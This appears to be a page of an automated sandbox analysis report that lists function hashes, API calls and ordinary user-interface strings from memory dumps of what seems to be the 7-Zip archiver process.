                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                              • Instruction ID: b06e3ec2b6fe01b32866d35603efa8cbed54eb3b2d58289fb62bc25d52667a99
                                              • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                              • Instruction Fuzzy Hash: 9201A86335698145CA11FF26E65166F5310E7C7B9AF0114679F4E53712DE7CC44BCA08
                                              APIs
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 0049692E
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 00496937
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 00496940
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 00496949
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 00496952
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 0049695B
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 00496964
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 0049696D
                                              • free.MSVCRT(?,?,?,?,004973C2), ref: 00496975
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                              • Instruction ID: a3d823f2daf693a59f6b7af6c78e7ce68eb3df3c35bbe5e701b10e4557fd3420
                                              • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                              • Instruction Fuzzy Hash: 54015A63712D8189CA10EE37DE9116A2720AB87B9E7180177BF1D4B716DEA8CC4A8748
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                              • Instruction ID: cb7c82c09fb953f572856201f347cd0c232a3e9ec642704e4163c3d5c406126c
                                              • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                              • Instruction Fuzzy Hash: B9015253712D8189CB10AE37DD9115A2320AB82B9EB084177BF1D0B757DEA8C84A8748
                                              APIs
                                              • fputs.MSVCRT ref: 0049C91C
                                              • fputs.MSVCRT ref: 0049C9F1
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                                • Part of subcall function 00452300: fputc.MSVCRT ref: 00452311
                                              • fputs.MSVCRT ref: 0049CADA
                                                • Part of subcall function 004522E4: fflush.MSVCRT ref: 004522EB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free$fflushfputcmemset
                                              • String ID: ERROR: $ERRORS:$WARNINGS:
                                              • API String ID: 2975459029-4064182643
                                              • Opcode ID: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                              • Instruction ID: b9cb7ada22e8ed73c4e1a096b6b851cb19f094ed09f42e6b8363b4599077324e
                                              • Opcode Fuzzy Hash: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                              • Instruction Fuzzy Hash: 5D613B66740A859ACE38EB72E59136E7B11F782B85F48403BDF1B07702DF6CD8998358
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: : $...$Junction: $REPARSE:
                                              • API String ID: 1294909896-1476144188
                                              • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                              • Instruction ID: b9c964a41a9db6417ed24b163b44ef824f6834ac88cc51dd3f2d4044d337cde7
                                              • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                              • Instruction Fuzzy Hash: F551E362210A0492CF20FF22E85136E7761FB817EAF84942BEE4747755DB7CC549CB19
                                              APIs
                                              • EnterCriticalSection.KERNEL32 ref: 00490E9C
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                              • fputs.MSVCRT ref: 00490F5D
                                              • fputs.MSVCRT ref: 00490FD8
                                              • fputs.MSVCRT ref: 00490FF4
                                              • LeaveCriticalSection.KERNEL32 ref: 00491092
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                              • String ID: ???
                                              • API String ID: 2578255354-1053719742
                                              • Opcode ID: 00556c404eac33c9a52bd7bb8a653997888a1c921732fb09df82643b0d7878c8
                                              • Instruction ID: 039678ec8165ce87aa0747aa9a94af955ee3999c22369eff1a0c381aeed7368c
                                              • Opcode Fuzzy Hash: 00556c404eac33c9a52bd7bb8a653997888a1c921732fb09df82643b0d7878c8
                                              • Instruction Fuzzy Hash: 9E516D72300A81A6DE18DF22DA843AE6720F785B99F444127DF2D47B65DF7CD5A9C308
                                              APIs
                                              Strings
                                              • Would you like to replace the existing file:, xrefs: 00490CF0
                                              • with the file from archive:, xrefs: 00490D1C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CriticalSectionfputs$EnterLeave
                                              • String ID: Would you like to replace the existing file:$with the file from archive:
                                              • API String ID: 3346953513-686978020
                                              • Opcode ID: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                              • Instruction ID: c8179d37d17f168190acbfd3591dd218a3d262f80ef18a7315f67fd5493b4813
                                              • Opcode Fuzzy Hash: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                              • Instruction Fuzzy Hash: 514104A23506829ADF288F66D8903AA7B20F785B94F4482339F2D47751CF3CD899D30D
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CriticalSectionfputs$EnterLeavefree
                                              • String ID: :
                                              • API String ID: 1989314732-3653984579
                                              • Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                              • Instruction ID: f10159ae279908595c3dc886916eed9a70a52eb077cd738daabffb0e209e7559
                                              • Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                              • Instruction Fuzzy Hash: 1C313C76200A4181DB259F26D8813AE3730F789B99F484237DE5D4B7A9DF78C889C318
                                              APIs
                                              Strings
                                              • Enter password (will not be echoed):, xrefs: 0049CE69
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ConsoleMode$Handlefflushfputs
                                              • String ID: Enter password (will not be echoed):
                                              • API String ID: 108775803-3720017889
                                              • Opcode ID: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                              • Instruction ID: 16a62cca2954c2bde31b828f6aa43f0bbee0bd0eb947d94923f6ab03cc63c211
                                              • Opcode Fuzzy Hash: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                              • Instruction Fuzzy Hash: 1C21CB5230160182EE14DB6599947372751AB497F5F185237EF17477E5DB6CC849C308
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputsfree
                                              • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                              • API String ID: 2581285248-3393983761
                                              • Opcode ID: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                              • Instruction ID: 0e88c6063a93fd2bee91cccf04d227335620ed420f23047df83600eb5b380c6e
                                              • Opcode Fuzzy Hash: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                              • Instruction Fuzzy Hash: ED2151A230194699CE20DF26E85039D6720F7CABE9F445227EF1E47765EF2CD54AC704
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: Version$AddressHandleModuleProc
                                              • String ID: SetDefaultDllDirectories$kernel32.dll
                                              • API String ID: 2268189529-2102062458
                                              • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                              • Instruction ID: bc5d9e8f6642c13eaea30b6a9c02b5067547fae17688f0f8d9e2da70ad700350
                                              • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                              • Instruction Fuzzy Hash: 65F0F8B5645602C2EF349B50F8547AA27A0FB88709F450236C34E812B4EF3CC64DCB18
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                              • Instruction ID: 3416a4f16659eea50262ea14e1346d62be955632763cad5e9094b61b9d694613
                                              • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                              • Instruction Fuzzy Hash: CB71D22321DAC086CA20FB26E45069FA760F7CA794F644507EF9A43B5ACB7CC949CB05
                                              APIs
                                              • free.MSVCRT(?,?,?,?,?,00484D4C), ref: 0047BBD6
                                              • free.MSVCRT(?,?,?,?,?,00484D4C), ref: 0047BC04
                                                • Part of subcall function 00453404: free.MSVCRT ref: 00453431
                                                • Part of subcall function 00453404: memmove.MSVCRT ref: 0045344C
                                              • free.MSVCRT(?,?,?,?,?,00484D4C), ref: 0047BC1D
                                              • free.MSVCRT(?,?,?,?,?,00484D4C), ref: 0047BC33
                                              • free.MSVCRT(?,?,?,?,?,00484D4C), ref: 0047BC41
                                              • free.MSVCRT(?,?,?,?,?,?,?,00484D4C), ref: 0047BCFA
                                              • free.MSVCRT(?,?,?,?,?,?,?,00484D4C), ref: 0047BD0E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                              • Instruction ID: 201c23522bb5be2283f5f110b65520e27aa692cdf9e3f2dbbecb891be5758bc0
                                              • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                              • Instruction Fuzzy Hash: EA41E82320468489DB32AF25D4013EA3760D79279CF14C11BEE5E07796DFBDC58AC789
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: freememmove$ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 1818558235-0
                                              • Opcode ID: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
                                              • Instruction ID: 825153bce31b9941e3a283c8f89b448e23b20ce1972a3d08af89fde9fb3b21ec
                                              • Opcode Fuzzy Hash: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
                                              • Instruction Fuzzy Hash: 59318AB27126908B8B64DF7BD58202E73A5E784FCC314812BDF1C87709DA68D882CB84
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                              • Instruction ID: 174f4c4177acb43835df2a12cc62ac6e8d322a16fafab65ed10a70d5d780cc3f
                                              • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                              • Instruction Fuzzy Hash: 6AF0EC2234B99245CA14FF33C55552F6751E7C7F86B042467AF4E53716CE6CC40ACA08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                              • Instruction ID: 168ef60cc85eb67fcb096abf44be0c88264b4eef815d3412680b34415ddb11ca
                                              • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                              • Instruction Fuzzy Hash: 85F0C42234AD9281CA14BB33C6A562F6710F7C3F8AF051457AF4E23712CEACC44ACA09
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                              • Instruction ID: d2cd603f0c54bd1111725038e9c3275b2a2e23a5f8606ca7e16b65ce68f5965e
                                              • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                              • Instruction Fuzzy Hash: D3F0C92234A98241CA10FF33C95562F6721F7C3F8AB0514579F4E63712CE6CC50ACA09
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                              • Instruction ID: 40bc911794d4a221c9b684564e472ccb076b6d332b24289734ad36942a9d4baa
                                              • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                              • Instruction Fuzzy Hash: F4F0E72234B98281CA10FF33C6A562F6720EBC7F8AB051457AF4E13712CE6CC40ACA08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                              • Instruction ID: 9c5ba1de48aa0024a6d96342a55535925e63b42f75ea94ecf89fff589e3c720e
                                              • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                              • Instruction Fuzzy Hash: 5AF0972234B99245CA14FB33C65562F6751EBC7F8AB051467AF4E63716CEACC40ACA0D
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                              • Instruction ID: c78c288b721c4a3ea165e8780530ed5ed0e4ba2445e43ee7a9658c8223cc2060
                                              • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                              • Instruction Fuzzy Hash: 47F0972234698245CA14BB33D65162F6720FBC7F86B012457AF4E63712CE6CC40ACA0D
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                              • Instruction ID: 7ec338b3adfd38314c98db054197cf47820610c31283725855d9b73aa81d9dd3
                                              • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                              • Instruction Fuzzy Hash: EBF0A92234698145CA14BF33C65152F6320EBC7F86B002457AF4E63712CE6CC40ACA0D
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
